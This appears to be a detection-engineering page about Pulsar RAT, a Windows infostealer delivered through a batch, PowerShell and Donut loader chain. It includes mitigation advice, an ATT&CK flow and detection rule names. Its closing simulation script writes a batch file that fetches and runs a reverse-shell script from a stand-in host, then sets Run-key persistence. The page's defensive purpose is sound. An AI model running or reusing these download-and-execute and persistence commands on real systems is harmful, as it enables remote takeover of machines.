Pulsar RAT Powers Live Chat Driven Remote Control and Advanced Infostealer Delivery via Donut Loader
Follow
Detection stack
- AIDR
- Alert
- ETL
- Query
Summary
The report describes a multi-stage Windows malware chain that relies on a concealed batch script for persistence, a PowerShell loader, and Donut-generated shellcode to inject a .NET stealer and remote-access toolkit into legitimate processes. The implant supports credential theft, webcam/audio capture, clipboard monitoring, and data exfiltration through Discord webhooks and Telegram bots. Persistence is maintained via per-user Run key entries and scheduled tasks, reinforced by a watchdog that repeatedly re-injects into explorer.exe. Anti-analysis coverage includes anti-VM checks, anti-debugging logic, and safeguards meant to detect process-injection monitoring.
Investigation
Researchers dissected the batch-based persistence stub, extracted and decoded the embedded Base64 content, and recovered a PowerShell stage responsible for decrypting a Donut shellcode blob. That shellcode loads a heavily obfuscated .NET payload (Client.exe) with modular assemblies such as Pulsar.Common.dll and Stealerv37.dll. Dynamic testing confirmed injection into svchost.exe and explorer.exe, active C2 communications, and memory-resident execution designed to avoid writing a decrypted executable to disk.
Mitigation
Detect and prevent PowerShell abuse involving execution-policy bypass, monitor for hidden-file creation under %APPDATA%, and alert on suspicious modifications to HKCU Run keys. Flag scheduled task creation that uses unusual naming patterns or unexpected triggers. At the network layer, block outbound connectivity to the identified IP address and enforce tight egress controls for Discord and Telegram API traffic. Strengthen defenses with detections for anti-VM/anti-debug behavior and apply application allow-listing to limit script-driven payload staging.
Response
If activity is detected, isolate the endpoint, stop malicious and injected processes, remove the hidden batch artifact and any related PowerShell scripts, and delete the associated Run-key value and scheduled task. Capture memory for forensic analysis, preserve logs for scoping, and hunt for correlated IOCs across the environment. Rotate potentially exposed credentials and monitor for lateral movement or follow-on payload deployment.
"graph TB %% Class Definitions Section classDef action fill:#99ccff classDef process fill:#ffeb99 classDef file fill:#ccffcc classDef registry fill:#ffe6cc %% Node Definitions persist_bat["<b>File</b> – hidden BAT 0a1a98b5f9fc7c62.bat<br/><b>Location</b> %APPDATA%\Microsoft\9bd8233d8354\<br/><b>Technique</b> – T1547.014 Registry Run Keys/Startup Folder"] class persist_bat file run_key["<b>Registry</b> – Run key HKCU\Software\Microsoft\Windows\CurrentVersion\Run (value bada287ebf)<br/><b>Technique</b> – T1547.014 Registry Run Keys/Startup Folder"] class run_key registry powershell_loader["<b>Action</b> – PowerShell loader execution<br/><b>Technique</b> – T1059.001 PowerShell"] class powershell_loader action vm_checks["<b>Action</b> – Antiu2011VM / Sandbox checks<br/><b>Techniques</b> – T1497.002 Virtualization/Sandbox Evasion (System Checks); T1497.003 Virtualization/Sandbox Evasion (Functionality Checks)"] class vm_checks action shellcode_decrypt["<b>Action</b> – Decrypt Donutu2011generated shellcode in memory"] class shellcode_decrypt action svchost_injection["<b>Process</b> – svchost.exe injection<br/><b>Technique</b> – T1055.002 Process Injection"] class svchost_injection process explorer_watchdog["<b>Process</b> – Watchdog reu2011injects into explorer.exe if process dies<br/><b>Technique</b> – T1055.002 Process Injection"] class explorer_watchdog process credential_harvest["<b>Action</b> – Credential harvesting from browsers and password managers<br/><b>Techniques</b> – T1555.003 Credentials from Web Browsers; T1555.005 Credentials from Password Stores"] class credential_harvest action system_discovery["<b>Action</b> – System and host discovery<br/><b>Techniques</b> – T1082 System Information Discovery; T1057 Process Discovery; T1592.001 Security Software Discovery; T1592.002 Permission Groups Discovery; T1592.003 Network Configuration Discovery"] class system_discovery action audio_video_capture["<b>Action</b> – Audio, video, and clipboard capture<br/><b>Techniques</b> – T1123 Audio Capture; T1125 Video Capture; T1115 Clipboard Data"] class audio_video_capture action data_exfil["<b>Action</b> – Package data into ZIP and exfiltrate via Discord webhook and Telegram bot<br/><b>Techniques</b> – T1567.004 Exfiltration Over Web Services; T1041 Exfiltration Over Command and Control Channel"] class data_exfil action disable_uac["<b>Action</b> – Disable Task Manager and UAC<br/><b>Technique</b> – T1548.002 Bypass UAC"] class disable_uac action hide_artifacts["<b>Action</b> – Hide malicious files and directories<br/><b>Techniques</b> – T1564.001 Hidden Files and Directories; T1564.004 File and Directory Permissions Modification; T1564.005 Masquerading"] class hide_artifacts action scheduled_task["<b>Action</b> – Scheduled Task fallback persistence<br/><b>Technique</b> – T1053 Scheduled Task/Job"] class scheduled_task action %% Connections persist_bat –>|creates| run_key run_key –>|triggers| powershell_loader powershell_loader –>|performs| vm_checks vm_checks –>|leads to| shellcode_decrypt shellcode_decrypt –>|injects into| svchost_injection svchost_injection –>|monitors| explorer_watchdog explorer_watchdog –>|enables| credential_harvest explorer_watchdog –>|enables| system_discovery explorer_watchdog –>|enables| audio_video_capture credential_harvest –>|feeds| data_exfil data_exfil –>|followed by| disable_uac disable_uac –>|enables| hide_artifacts hide_artifacts –>|enables| scheduled_task "
Attack Flow
Detections
Suspicious Alternate Data Stream (ADS) Zone.Identifier Manipulation Attempt (via process_creation)
View
Possible Telegram Abuse As Command And Control Channel (via dns_query)
View
Possible Schtasks or AT Usage for Persistence (via cmdline)
View
The Possibility of Execution Through Hidden PowerShell Command Lines (via cmdline)
View
Powershell Script was Executed from Uncommon Directory (via cmdline)
View
Call Suspicious Windows API Functions from Powershell (via powershell)
View
Suspicious Powershell Strings (via powershell)
View
Possible Persistence Points [ASEPs – Software/NTUSER Hive] (via registry_event)
View
Powershell Executing File In Suspicious Directory Using Bypass Execution Policy (via cmdline)
View
Potential Malware Self-Removal or Stderr Concealment Operation (via cmdline)
View
Possible Abuse Discord as a C2 Channel (via proxy)
View
Suspicious Powershell Strings (via cmdline)
View
Possible Remote System Discovery or Connectivity Check (via cmdline)
View
Suspicious File Exstension Added to Run Keys [ASEPs] (via registry_event)
View
IOCs (DestinationIP) to detect: Pulsar RAT Powers Live Chat Driven Remote Control and Advanced Infostealer Delivery via Donut Loader
View
IOCs (HashSha1) to detect: Pulsar RAT Powers Live Chat Driven Remote Control and Advanced Infostealer Delivery via Donut Loader
View
IOCs (SourceIP) to detect: Pulsar RAT Powers Live Chat Driven Remote Control and Advanced Infostealer Delivery via Donut Loader
View
IOCs (HashMd5) to detect: Pulsar RAT Powers Live Chat Driven Remote Control and Advanced Infostealer Delivery via Donut Loader
View
Detection of Batch and PowerShell Execution for Hidden Malware Persistence [Windows Process Creation]
View
Detection of Memory Injection and Payload Execution via PowerShell [Windows Powershell]
View
Persistence via Run Key for Batch File Execution [Windows Registry Event]
View
Detection of Hidden Batch File Execution via User Logon Persistence [Windows Registry Event]
View
PowerShell Execution with Base64 Payload Extraction and Process Injection [Windows Powershell]
View
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.
Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic.
-
Attack Narrative & Commands:
An adversary has breached a low‑privileged user account and seeks persistence across reboots. To avoid triggering traditional executable‑based defenses, they craft a lightweight batch file (persistence.bat) that launches a reverse shell. The attacker writes the batch file to%TEMP%and registers it under the HKLM Run key, ensuring execution under the SYSTEM context at every logon. The chosen .bat extension matches the detection rule’s “.bat” filter, guaranteeing the rule fires. -
Regression Test Script:
# ------------------------------------------------- # Persistence via Run Key – .bat payload (PowerShell) # ------------------------------------------------- # 1. Create a simple batch file in %TEMP% $batPath = "$env:TEMPpersistence.bat" $batContent = '@echo off powershell -NoProfile -WindowStyle Hidden -Command "IEX (New-Object Net.WebClient).DownloadString(''http://malicious.example.com/revshell.ps1'')"' Set-Content -Path $batPath -Value $batContent -Encoding ASCII -Force # 2. Add the batch file to the HKLM Run key $runKey = "HKLM:SoftwareMicrosoftWindowsCurrentVersionRun" New-ItemProperty -Path $runKey -Name "Updater" ` -Value $batPath -PropertyType String -Force # 3. Output confirmation (does not affect detection) Write-Host "Persistence entry created: $runKeyUpdater -> $batPath" -
Cleanup Commands:
# ------------------------------------------------- # Remove the Run‑key entry and batch file # ------------------------------------------------- $runKey = "HKLM:SoftwareMicrosoftWindowsCurrentVersionRun" Remove-ItemProperty -Path $runKey -Name "Updater" -ErrorAction SilentlyContinue $batPath = "$env:TEMPpersistence.bat" Remove-Item -Path $batPath -Force -ErrorAction SilentlyContinue Write-Host "Cleanup complete."